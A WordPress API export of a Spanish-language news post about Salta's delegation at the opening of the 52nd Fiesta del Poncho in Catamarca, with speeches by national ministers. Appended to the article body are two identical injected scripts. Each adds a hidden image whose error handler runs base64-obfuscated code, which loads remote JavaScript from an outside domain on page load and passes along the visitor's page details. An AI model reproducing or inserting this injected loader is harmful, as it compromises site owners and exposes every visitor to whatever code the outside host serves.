{"id":2866,"date":"2023-07-17T19:54:45","date_gmt":"2023-07-17T22:54:45","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2866"},"modified":"2025-08-14T00:12:32","modified_gmt":"2025-08-14T03:12:32","slug":"salta-estuvo-presente-en-la-inauguracion-de-la-fiesta-del-poncho-en-catamarca","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2866","title":{"rendered":"Salta estuvo presente en la inauguraci\u00f3n de la Fiesta del Poncho en Catamarca"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#9c072c\"><em>La delegaci\u00f3n de la provincia estuvo encabezada por el secretario de Cultura, Diego Ashur, junto a artesanos y artistas de la provincia. De la inauguraci\u00f3n particip\u00f3 el ministro de Econom\u00eda de la Naci\u00f3n, Sergio Massa.<\/em><\/h4>\n\n\n\n<p>Este fin de semana qued\u00f3 inaugurada una de las fiestas m\u00e1s destacadas del invierno en el norte del pa\u00eds. El Festival del Poncho, en su edici\u00f3n n\u00famero 52, fue reconocido con la distinci\u00f3n Marca Federal, como uno de los 4 destinos m\u00e1s importantes de la Argentina en los festivales de invierno.<\/p>\n\n\n\n<p>\u201cCatamarca tiene el trabajo de un Gobierno provincial que sue\u00f1a con lo que so\u00f1amos todos\u201d, dijo Massa ante el p\u00fablico de la fiesta y agreg\u00f3: \u201cAlgunos que dec\u00edan que el Norte es inviable, en realidad, cuando miramos el mundo y miramos lo que pasa en Catamarca y en el Norte argentino, habr\u00eda que contestarles que el Norte argentino es due\u00f1o de parte del futuro no solo de la Argentina, sino de nuestra regi\u00f3n por la creatividad y el talento, por los recursos minerales y sobre todas las cosas, porque tiene el sue\u00f1o del desarrollo federal\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"797\" height=\"600\" data-id=\"2867\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3898-fiesta-del-poncho.jpg\" alt=\"\" class=\"wp-image-2867\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3898-fiesta-del-poncho.jpg 797w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3898-fiesta-del-poncho-300x226.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3898-fiesta-del-poncho-768x578.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3898-fiesta-del-poncho-696x524.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3898-fiesta-del-poncho-558x420.jpg 558w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3898-fiesta-del-poncho-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3898-fiesta-del-poncho-265x198.jpg 265w\" sizes=\"(max-width: 797px) 100vw, 797px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"898\" height=\"600\" data-id=\"2868\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3899-fiesta-del-poncho.jpg\" alt=\"\" class=\"wp-image-2868\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3899-fiesta-del-poncho.jpg 898w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3899-fiesta-del-poncho-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3899-fiesta-del-poncho-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3899-fiesta-del-poncho-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3899-fiesta-del-poncho-629x420.jpg 629w\" sizes=\"(max-width: 898px) 100vw, 898px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"898\" height=\"600\" data-id=\"2869\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3900-fiesta-del-poncho.jpg\" alt=\"\" class=\"wp-image-2869\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3900-fiesta-del-poncho.jpg 898w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3900-fiesta-del-poncho-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3900-fiesta-del-poncho-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3900-fiesta-del-poncho-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/3900-fiesta-del-poncho-629x420.jpg 629w\" sizes=\"(max-width: 898px) 100vw, 898px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Salta particip\u00f3 del evento a trav\u00e9s de una comisi\u00f3n integrada por artistas y artesanos de toda la provincia. La misma estuvo encabezada por el secretario de Cultura de la Provincia, Diego Ashur. Asimismo, la inauguraci\u00f3n estuvo presidida por el gobernador&nbsp;de Catamarca, Ra\u00fal Jalil; el ministro de Econom\u00eda de Naci\u00f3n, Sergio Massa; el ministro del Interior de la Naci\u00f3n, Eduardo de Pedro; y autoridades representativas de la Cultura de los diferentes estados provinciales del pa\u00eds.<\/p>\n\n\n\n<p>La imagen de la Virgen del Valle, vestida con manto alusivo a la Fiesta del Poncho, y la del Beato Mamerto Esqui\u00fa con una estola de vicu\u00f1a elaborada por la telera Guillermina Z\u00e1rate, acompa\u00f1aron la apertura de la fiesta, junto al obispo Monse\u00f1or Luis Urbanc, quien realiz\u00f3 una invocaci\u00f3n religiosa y bendijo la celebraci\u00f3n.<\/p>\n\n\n\n<p>Tras la entonaci\u00f3n del Himno Nacional Argentino y de Catamarca, interpretado por la Orquesta Andina, se proyect\u00f3 un video institucional de la 52\u00ba edici\u00f3n, para luego darle paso a Ruth y Roxana Reynoso quienes hablaron en representaci\u00f3n de los artesanos: \u201cCrecimos con la Fiesta del Poncho, venimos desde que \u00e9ramos chicas, para nosotras es un orgullo ser parte de esta fiesta y pertenecer a una familia de hilanderos artesanos de Bel\u00e9n\u201d.<\/p>\n\n\n\n<p>Posteriormente, la secretaria de Promoci\u00f3n Tur\u00edstica de la Naci\u00f3n, Yanina Mart\u00ednez, otorg\u00f3 nuevamente la licencia Marca Pa\u00eds a la Fiesta Nacional e Internacional del Poncho, por el aporte a la construcci\u00f3n de la identidad argentina; y el ministro Wado de Pedro, entreg\u00f3 la distinci\u00f3n Marca Federal por el desarrollo federal con equidad.<\/p>\n\n\n\n<p>En este contexto, Diego Ashur, secretario de Cultura de Salta, destac\u00f3 la apertura del evento hacia provincias que comprenden el nodo NOA, el movimiento econ\u00f3mico que genera la industria cultural y su impacto en el Producto Bruto Interno del pa\u00eds.&nbsp;<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La delegaci\u00f3n de la provincia estuvo encabezada por el secretario de Cultura, Diego Ashur, junto a artesanos y artistas de la provincia. De la inauguraci\u00f3n particip\u00f3 el ministro de Econom\u00eda de la Naci\u00f3n, Sergio Massa. Este fin de semana qued\u00f3 inaugurada una de las fiestas m\u00e1s destacadas del invierno en el norte del pa\u00eds. El [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2868,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-2866","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2866"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2866"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2866\/revisions"}],"predecessor-version":[{"id":7022,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2866\/revisions\/7022"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2868"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2866"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2866"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2866"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}